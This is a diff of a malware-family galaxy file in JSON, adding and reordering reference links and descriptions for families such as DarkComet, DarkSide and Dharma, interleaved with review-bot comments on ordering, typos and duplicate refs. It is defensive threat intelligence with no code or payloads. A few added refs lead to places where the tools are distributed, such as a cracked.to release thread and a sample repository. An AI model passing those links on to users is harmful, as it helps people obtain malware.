+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://research.checkpoint.com/danabot-demands-a-ransom-payment/",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
+ "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/"
 ],
 "synonyms": [],
 "type": []
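Review bot: Most of the DanaBot refs churn in this hunk is reordering rather than content: the asert.arbornetworks.com, fortinet.com, trustwave.com, yoroi and welivesecurity entries are removed and re-added at new positions, so the diff does not show which sources were actually added or dropped. The same happens in the Datper, Dexter, DiamondFox and DistTrack hunks further down. Emitting refs in a stable (sorted) order at export or import time would keep future syncs reviewable. Separately, the description line is rewritten only because non-ASCII characters now come out as `\u201c`/`\u2019` escapes instead of UTF-8 (the Derusbi hunk shows the same); that is valid JSON, but it indicates the serializer settings changed, which should be applied consistently across the whole file rather than per sync.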
@@ -6699,17 +12941,41 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot",
+ "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
+ "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f",
+ "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "98d3c6b3-c29f-46ba-b24d-88b135cd3183",
+ "value": "danbot"
+ },
+ {
+ "description": "DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
 "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
 "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/",
- "https://darkcomet.net",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet",
"https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/"
 ],
 "synonyms": [
+ "Breut",
 "Fynloski",
 "klovbot"
 ],
@@ -6762,12 +13028,24 @@
 "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0",
 "value": "DarkPulsar"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat",
+ "https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bcff979f-2b4b-41cc-86c9-fe1ea3adce6e",
+ "value": "DarkRat"
+ },
 {
 "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell",
- "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell"
 ],
 "synonyms": [],
 "type": []
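Review bot: The new DarkComet description spells the author's name two ways, `Jean-Pierre Lesueur` and then `Lesuer decided`; the second should read `Lesueur decided`. It also says DarkComet is "able to enable control over a compromised system", which reads as a slip for "enables control over". The text is copied from upstream, so the durable fix is in the Malpedia description rather than a local patch, but this cluster is what MISP users see and search.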
@@ -6775,14 +13053,37 @@
 "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836",
 "value": "DarkShell"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6",
+ "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
+ "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
+ "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html",
+ "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968",
+ "https://www.acronis.com/en-us/articles/darkside-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "625bcba0-faab-468e-b5ab-61116cb1b5cf",
+ "value": "DarkSide"
+ },
 {
 "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood.
The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky",
 "http://telegra.ph/Analiz-botneta-DarkSky-12-30",
- "https://blog.radware.com/security/2018/02/darksky-botnet/",
- "https://github.com/ims0rry/DarkSky-botnet"
+ "https://blog.radware.com/security/2018/02/darksky-botnet/"
 ],
 "synonyms": [],
 "type": []
@@ -6817,12 +13118,16 @@
 "value": "DarkTequila"
 },
 {
- "description": "",
+ "description": "DtBackdoor",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat",
+ "https://www.facebook.com/darktrackrat/",
+ "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1",
 "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml",
- "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html"
+ "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html",
+ "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469"
 ],
 "synonyms": [],
 "type": []
@@ -6836,6 +13141,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-butler",
 "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
 "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/"
 ],
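Review bot: `"description": "DtBackdoor"` in the DarkTrack RAT hunk looks like an alias rather than a description; every other entry in this file keeps prose in `description` and puts alternative names under `synonyms`, so this should probably be `"synonyms": ["DtBackdoor"]` with the description left empty. Two of the added refs are also not analyses: the facebook.com page and the cracked.to release thread are the tool's own distribution channels, and a reference list consumed by defenders gains nothing from pointing at them. If the upstream export carries such links, filtering refs by source type during import would be a cleaner fix than editing the cluster by hand.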
@@ -6853,9 +13159,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
 "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
- "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.macnica.net/mpressioncss/feature_05.html/",
+ "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -6863,11 +13175,62 @@
 "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c",
 "value": "Datper"
 },
+ {
+ "description": "This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader",
+ "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html",
+ "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands",
+ "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader"
+ ],
+ "synonyms": [
+ "ModiLoader",
+ "NatsoLoader"
+ ],
+ "type": []
+ },
+ "uuid": "17e0756b-6cc6-4c25-825c-5fd85c236218",
+ "value": "DBatLoader"
+ },
+ {
+ "description": "DCRat is a typical RAT that has been around since at least June 2019.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat",
+ "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html",
+ "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html"
+ ],
+ "synonyms": [
+ "DarkCrystal RAT"
+ ],
+ "type": []
+ },
+ "uuid": "b32ffb50-8ef1-4c78-a71a-bb23089b4de6",
+ "value": "DCRat"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger",
+ "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "78796a09-cac4-47fc-9e31-9f2ff5b8e377",
+ "value": "DDKeylogger"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
 ],
 "synonyms": [],
@@ -6876,12 +13239,33 @@
 "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2",
 "value": "DDKONG"
 },
+ {
+ "description": "Also known as Wacatac ransomware due to its .wctc extension.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom",
+ "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html",
+ "https://asec.ahnlab.com/1269",
+ "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html",
+ "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html",
+ "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html",
+ "https://twitter.com/Amigo_A_/status/1196898012645220354",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md"
+ ],
+ "synonyms": [
+ "deathransom",
+ "wacatac"
+ ],
+ "type": []
+ },
+ "uuid": "2bc6623a-d7d6-48fc-af79-647648f455aa",
+ "value": "DeathRansom"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal",
- "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157",
 "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf",
 "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html"
 ],
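Review bot: The DBatLoader refs array (in the hunk that ends here) contains `https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader` twice, as its first and its last element. JSON permits repeated array elements, but every other entry carries the Malpedia self-link exactly once, so this is most likely an export glitch; de-duplicating refs during import would catch it and similar cases. In the DeathRansom hunk the synonym `deathransom` differs from the value `DeathRansom` only by case, which the same pass could flag if the comparison is made case-insensitive.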
@@ -6891,12 +13275,38 @@
 "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
 "value": "Decebal"
 },
+ {
+ "description": "Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.\r\n\r\nThe distribution of Defray has several notable characteristics:\r\nAccording to Proofpoint:\r\n\"\r\nDefray is currently being spread via Microsoft Word document attachments in email\r\nThe campaigns are as small as several messages each\r\nThe lures are custom crafted to appeal to the intended set of potential victims\r\nThe recipients are individuals or distribution lists, e.g., group@ and websupport@\r\nGeographic targeting is in the UK and US\r\nVertical targeting varies by campaign and is narrow and selective\r\n\"",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/"
+ ],
+ "synonyms": [
+
"Glushkov"
+ ],
+ "type": []
+ },
+ "uuid": "bbc6dbe3-0ade-4b80-a1cb-c19e23ea8b88",
+ "value": "Defray"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas",
- "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas"
 ],
 "synonyms": [],
 "type": []
@@ -6916,12 +13326,27 @@
 "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59",
 "value": "Dented"
 },
+ {
+ "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon",
+ "https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "17429ed4-6106-4a28-9a76-f19cd476d94b",
+ "value": "Deprimon"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog",
- "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html",
+ "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
 ],
 "synonyms": [],
 "type": []
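Review bot: The new entry's `"value": "Deprimon"` does not match the casing its own description and the cited ESET write-up use, `DePriMon`. `value` is the name MISP displays and matches on, so either the canonical casing should be used there or `DePriMon` should be listed under `synonyms` so that lookups with the published spelling still resolve.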
@@ -6943,13 +13368,37 @@
 "value": "DeriaLock"
 },
 {
- "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
+ "description": "DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe",
+ "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d348373e-df43-4916-ac23-4f6e344c59e1",
+ "value": "DeroHE"
+ },
+ {
+ "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
 "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
 "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
- "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+
"https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family",
+ "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf",
+ "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/"
 ],
 "synonyms": [
 "PHOTO"
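Review bot: The new DeroHE description reads `The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application`, which is missing a word; it should read `delivered as a DLL`. Minor, but `description` is shown verbatim to MISP users, and the Derusbi description in the same hunk also begins with a stray leading space that a strip() during import would remove.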
@@ -6971,18 +13420,44 @@
 "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631",
 "value": "Devil's Rat"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia",
+ "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf"
+ ],
+ "synonyms": [
+ "CONIME"
+ ],
+ "type": []
+ },
+ "uuid": "4792fe0d-5c2f-44b1-861a-4b0501ccd335",
+ "value": "Dexbia"
+ },
+ {
+ "description": "Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources. It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot",
+ "https://www.microsoft.com/security/blog/2019/11/26/insights-from-one-year-of-tracking-a-polymorphic-threat/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b9f6de53-13b3-4246-96d5-010851c75bdb",
+ "value": "Dexphot"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter",
- "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
- "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
+ "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
 "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf",
- "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information",
-
"https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/",
+ "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html"
 ],
 "synonyms": [
 "LusyPOS"
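Review bot: The Dexphot description added in this hunk does not parse as English in two places, `a file-less technology to become inject malicious behavior` and `According to Microsoft the Dexphot It hijacked`, and it ends with a trailing space inside the string. A reading that keeps the stated facts would be `It implements many techniques to evade common security systems and fileless techniques to inject malicious behavior. According to Microsoft, Dexphot hijacked legitimate system processes to disguise malicious activity.` The text comes from upstream, so the lasting fix is in the Malpedia entry, but the cluster republishes it verbatim.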
@@ -6997,12 +13472,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
+ "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/",
+ "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/",
+ "https://www.group-ib.com/media/iran-cybercriminals/",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
 "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/",
- "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/"
+ "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
 ],
 "synonyms": [
 "Arena",
- "Crysis"
+ "Crysis",
+ "Wadhrama",
+ "ncov"
 ],
 "type": []
 },
@@ -7015,10 +13505,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox",
 "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/",
 "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
- "https://www.scmagazine.com/inside-diamondfox/article/578478/",
 "https://blog.cylance.com/a-study-in-bots-diamondfox",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/"
+ "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced",
+ "https://www.scmagazine.com/inside-diamondfox/article/578478/"
 ],
 "synonyms": [
 "Crystal",
@@ -7030,6 +13521,19 @@
 "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665",
 "value": "DiamondFox"
 },
+ {
+ "description": "APT10's fork of the (open-source) Quasar RAT.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "81c95462-62ba-4182-bba0-707e1f6cc1eb",
+ "value": "DILLJUICE"
+ },
 {
 "description": "",
 "meta": {
@@ -7048,8 +13552,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt",
- "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/",
- "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf"
+ "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/"
 ],
 "synonyms": [],
 "type": []
@@ -7057,6 +13560,20 @@
 "uuid": "61b2dd12-2381-429d-bb64-e3210804a462",
 "value": "DirCrypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr",
+ "https://twitter.com/r3c0nst/status/1232944566208286720",
+ "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9e343fd7-3809-49af-9903-db7daeac339b",
+ "value": "DispCashBR"
+ },
 {
 "description": "",
 "meta": {
